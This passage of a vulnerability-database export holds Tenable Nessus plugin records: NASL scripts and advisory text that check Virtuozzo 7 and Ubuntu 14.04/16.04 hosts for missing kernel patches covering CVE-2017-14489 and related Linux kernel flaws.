script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-327.36.1.vz7.18.7\",\n \"patch\",\"readykernel-patch-18.7-31.1-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-327.36.1.vz7.20.18\",\n \"patch\",\"readykernel-patch-20.18-31.1-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.16.1.vz7.30.10\",\n \"patch\",\"readykernel-patch-30.10-31.1-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.16.1.vz7.30.15\",\n \"patch\",\"readykernel-patch-30.15-31.1-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.26.1.vz7.33.22\",\n \"patch\",\"readykernel-patch-33.22-31.1-1.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_WARNING, release:\"Virtuozzo-7\");\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-06T09:13:15", "description": "According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - An unprivileged user inside a container could cause a\n denial of service (kernel crash in user_read()\n function) using a specially crafted sequence of system\n calls.\n\n - The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel\n through 4.13.2 allows local users to cause a denial of\n service (panic) by leveraging incorrect length\n validation.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 33, "cvss3": {"score": 5.5, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-09-25T00:00:00", "title": "Virtuozzo 7 : readykernel-patch (VZA-2017-082)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14489"], "modified": "2017-09-25T00:00:00", "cpe": ["cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:readykernel"], "id": "VIRTUOZZO_VZA-2017-082.NASL", "href": "https://www.tenable.com/plugins/nessus/103425", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103425);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-14489\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2017-082)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - An unprivileged user inside a container could cause a\n denial of service (kernel crash in user_read()\n function) using a specially crafted sequence of system\n calls.\n\n - The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel\n through 4.13.2 allows local users to cause a denial of\n service (panic) by leveraging incorrect length\n validation.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2878782\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-15.2-31.1-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a144d02b\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-327.18.2.vz7.15.2\",\n \"patch\",\"readykernel-patch-15.2-31.1-1.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_WARNING, release:\"Virtuozzo-7\");\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-01T06:46:06", "description": "USN-3469-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nAnthony Perard discovered that the Xen virtual block driver did not\nproperly initialize some data structures before passing them to user\nspace. A local attacker in a guest VM could use this to expose\nsensitive information from the host OS or other guest VMs.\n(CVE-2017-10911)\n\nBo Zhang discovered that the netlink wireless configuration interface\nin the Linux kernel did not properly validate attributes when handling\ncertain requests. A local attacker with the CAP_NET_ADMIN could use\nthis to cause a denial of service (system crash). (CVE-2017-12153)\n\nIt was discovered that the nested KVM implementation in the Linux\nkernel in some situations did not properly prevent second level guests\nfrom reading and writing the hardware CR8 register. A local attacker\nin a guest could use this to cause a denial of service (system crash).\n\nIt was discovered that the key management subsystem in the Linux\nkernel did not properly restrict key reads on negatively instantiated\nkeys. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2017-12192)\n\nIt was discovered that an integer overflow existed in the sysfs\ninterface for the QLogic 24xx+ series SCSI driver in the Linux kernel.\nA local privileged attacker could use this to cause a denial of\nservice (system crash). (CVE-2017-14051)\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux\nkernel did not properly initialize a data structure returned to user\nspace. A local attacker could use this to expose sensitive information\n(kernel memory). (CVE-2017-14156)\n\nDave Chinner discovered that the XFS filesystem did not enforce that\nthe realtime inode flag was settable only on filesystems on a realtime\ndevice. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2017-14340)\n\nChunYu Wang discovered that the iSCSI transport implementation in the\nLinux kernel did not properly validate data structures. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2017-14489)\n\nIt was discovered that the generic SCSI driver in the Linux kernel did\nnot properly initialize data returned to user space in some\nsituations. A local attacker could use this to expose sensitive\ninformation (kernel memory). (CVE-2017-14991)\n\nDmitry Vyukov discovered that the Floating Point Unit (fpu) subsystem\nin the Linux kernel did not properly handle attempts to set reserved\nbits in a task's extended state (xstate) area. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2017-15537)\n\nPengfei Wang discovered that the Turtle Beach MultiSound audio device\ndriver in the Linux kernel contained race conditions when fetching\nfrom the ring-buffer. A local attacker could use this to cause a\ndenial of service (infinite loop). (CVE-2017-9984, CVE-2017-9985).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-11-01T00:00:00", "title": "Ubuntu 14.04 LTS : linux-lts-xenial vulnerabilities (USN-3469-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14051", "CVE-2017-14489", "CVE-2017-14991", "CVE-2017-9984", "CVE-2017-15537", "CVE-2017-12192", "CVE-2017-9985", "CVE-2017-10911", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-12153", "CVE-2017-12154"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-lts-xenial", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-lts-xenial", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-xenial", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3469-2.NASL", "href": "https://www.tenable.com/plugins/nessus/104321", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3469-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104321);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2017-10911\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-12192\", \"CVE-2017-14051\", \"CVE-2017-14156\", \"CVE-2017-14340\", \"CVE-2017-14489\", \"CVE-2017-14991\", \"CVE-2017-15537\", \"CVE-2017-9984\", \"CVE-2017-9985\");\n script_xref(name:\"USN\", value:\"3469-2\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-xenial vulnerabilities (USN-3469-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-3469-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nAnthony Perard discovered that the Xen virtual block driver did not\nproperly initialize some data structures before passing them to user\nspace. A local attacker in a guest VM could use this to expose\nsensitive information from the host OS or other guest VMs.\n(CVE-2017-10911)\n\nBo Zhang discovered that the netlink wireless configuration interface\nin the Linux kernel did not properly validate attributes when handling\ncertain requests. A local attacker with the CAP_NET_ADMIN could use\nthis to cause a denial of service (system crash). (CVE-2017-12153)\n\nIt was discovered that the nested KVM implementation in the Linux\nkernel in some situations did not properly prevent second level guests\nfrom reading and writing the hardware CR8 register. A local attacker\nin a guest could use this to cause a denial of service (system crash).\n\nIt was discovered that the key management subsystem in the Linux\nkernel did not properly restrict key reads on negatively instantiated\nkeys. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2017-12192)\n\nIt was discovered that an integer overflow existed in the sysfs\ninterface for the QLogic 24xx+ series SCSI driver in the Linux kernel.\nA local privileged attacker could use this to cause a denial of\nservice (system crash). (CVE-2017-14051)\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux\nkernel did not properly initialize a data structure returned to user\nspace. A local attacker could use this to expose sensitive information\n(kernel memory). (CVE-2017-14156)\n\nDave Chinner discovered that the XFS filesystem did not enforce that\nthe realtime inode flag was settable only on filesystems on a realtime\ndevice. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2017-14340)\n\nChunYu Wang discovered that the iSCSI transport implementation in the\nLinux kernel did not properly validate data structures. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2017-14489)\n\nIt was discovered that the generic SCSI driver in the Linux kernel did\nnot properly initialize data returned to user space in some\nsituations. A local attacker could use this to expose sensitive\ninformation (kernel memory). (CVE-2017-14991)\n\nDmitry Vyukov discovered that the Floating Point Unit (fpu) subsystem\nin the Linux kernel did not properly handle attempts to set reserved\nbits in a task's extended state (xstate) area. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2017-15537)\n\nPengfei Wang discovered that the Turtle Beach MultiSound audio device\ndriver in the Linux kernel contained race conditions when fetching\nfrom the ring-buffer. A local attacker could use this to cause a\ndenial of service (infinite loop). (CVE-2017-9984, CVE-2017-9985).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3469-2/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-10911\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-12192\", \"CVE-2017-14051\", \"CVE-2017-14156\", \"CVE-2017-14340\", \"CVE-2017-14489\", \"CVE-2017-14991\", \"CVE-2017-15537\", \"CVE-2017-9984\", \"CVE-2017-9985\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3469-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-98-generic\", pkgver:\"4.4.0-98.121~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-98-generic-lpae\", pkgver:\"4.4.0-98.121~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-98-lowlatency\", pkgver:\"4.4.0-98.121~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic-lpae-lts-xenial\", pkgver:\"4.4.0.98.82\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic-lts-xenial\", pkgver:\"4.4.0.98.82\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-lowlatency-lts-xenial\", pkgver:\"4.4.0.98.82\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-generic / linux-image-4.4-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:46:06", "description": "Anthony Perard discovered that the Xen virtual block driver did not\nproperly initialize some data structures before passing them to user\nspace. A local attacker in a guest VM could use this to expose\nsensitive information from the host OS or other guest VMs.\n(CVE-2017-10911)\n\nBo Zhang discovered that the netlink wireless configuration interface\nin the Linux kernel did not properly validate attributes when handling\ncertain requests. A local attacker with the CAP_NET_ADMIN could use\nthis to cause a denial of service (system crash). (CVE-2017-12153)\n\nIt was discovered that the nested KVM implementation in the Linux\nkernel in some situations did not properly prevent second level guests\nfrom reading and writing the hardware CR8 register. A local attacker\nin a guest could use this to cause a denial of service (system crash).\n\nIt was discovered that the key management subsystem in the Linux\nkernel did not properly restrict key reads on negatively instantiated\nkeys. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2017-12192)\n\nIt was discovered that an integer overflow existed in the sysfs\ninterface for the QLogic 24xx+ series SCSI driver in the Linux kernel.\nA local privileged attacker could use this to cause a denial of\nservice (system crash). (CVE-2017-14051)\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux\nkernel did not properly initialize a data structure returned to user\nspace. A local attacker could use this to expose sensitive information\n(kernel memory). (CVE-2017-14156)\n\nDave Chinner discovered that the XFS filesystem did not enforce that\nthe realtime inode flag was settable only on filesystems on a realtime\ndevice. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2017-14340)\n\nChunYu Wang discovered that the iSCSI transport implementation in the\nLinux kernel did not properly validate data structures. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2017-14489)\n\nIt was discovered that the generic SCSI driver in the Linux kernel did\nnot properly initialize data returned to user space in some\nsituations. A local attacker could use this to expose sensitive\ninformation (kernel memory). (CVE-2017-14991)\n\nDmitry Vyukov discovered that the Floating Point Unit (fpu) subsystem\nin the Linux kernel did not properly handle attempts to set reserved\nbits in a task's extended state (xstate) area. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2017-15537)\n\nPengfei Wang discovered that the Turtle Beach MultiSound audio device\ndriver in the Linux kernel contained race conditions when fetching\nfrom the ring-buffer. A local attacker could use this to cause a\ndenial of service (infinite loop). (CVE-2017-9984, CVE-2017-9985).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-11-01T00:00:00", "title": "Ubuntu 16.04 LTS : linux, linux-aws, linux-gke, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities (USN-3469-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14051", "CVE-2017-14489", "CVE-2017-14991", "CVE-2017-9984", "CVE-2017-15537", "CVE-2017-12192", "CVE-2017-9985", "CVE-2017-10911", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-12153", "CVE-2017-12154"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-kvm", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-aws", "p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2", "cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-gke", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-raspi2", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-snapdragon", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-aws", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gke"], "id": "UBUNTU_USN-3469-1.NASL", "href": "https://www.tenable.com/plugins/nessus/104320", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3469-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104320);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2017-10911\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-12192\", \"CVE-2017-14051\", \"CVE-2017-14156\", \"CVE-2017-14340\", \"CVE-2017-14489\", \"CVE-2017-14991\", \"CVE-2017-15537\", \"CVE-2017-9984\", \"CVE-2017-9985\");\n script_xref(name:\"USN\", value:\"3469-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux, linux-aws, linux-gke, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities (USN-3469-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Anthony Perard discovered that the Xen virtual block driver did not\nproperly initialize some data structures before passing them to user\nspace. A local attacker in a guest VM could use this to expose\nsensitive information from the host OS or other guest VMs.\n(CVE-2017-10911)\n\nBo Zhang discovered that the netlink wireless configuration interface\nin the Linux kernel did not properly validate attributes when handling\ncertain requests. A local attacker with the CAP_NET_ADMIN could use\nthis to cause a denial of service (system crash). (CVE-2017-12153)\n\nIt was discovered that the nested KVM implementation in the Linux\nkernel in some situations did not properly prevent second level guests\nfrom reading and writing the hardware CR8 register. A local attacker\nin a guest could use this to cause a denial of service (system crash).\n\nIt was discovered that the key management subsystem in the Linux\nkernel did not properly restrict key reads on negatively instantiated\nkeys. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2017-12192)\n\nIt was discovered that an integer overflow existed in the sysfs\ninterface for the QLogic 24xx+ series SCSI driver in the Linux kernel.\nA local privileged attacker could use this to cause a denial of\nservice (system crash). (CVE-2017-14051)\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux\nkernel did not properly initialize a data structure returned to user\nspace. A local attacker could use this to expose sensitive information\n(kernel memory). (CVE-2017-14156)\n\nDave Chinner discovered that the XFS filesystem did not enforce that\nthe realtime inode flag was settable only on filesystems on a realtime\ndevice. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2017-14340)\n\nChunYu Wang discovered that the iSCSI transport implementation in the\nLinux kernel did not properly validate data structures. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2017-14489)\n\nIt was discovered that the generic SCSI driver in the Linux kernel did\nnot properly initialize data returned to user space in some\nsituations. A local attacker could use this to expose sensitive\ninformation (kernel memory). (CVE-2017-14991)\n\nDmitry Vyukov discovered that the Floating Point Unit (fpu) subsystem\nin the Linux kernel did not properly handle attempts to set reserved\nbits in a task's extended state (xstate) area. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2017-15537)\n\nPengfei Wang discovered that the Turtle Beach MultiSound audio device\ndriver in the Linux kernel contained race conditions when fetching\nfrom the ring-buffer. A local attacker could use this to cause a\ndenial of service (infinite loop). (CVE-2017-9984, CVE-2017-9985).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly 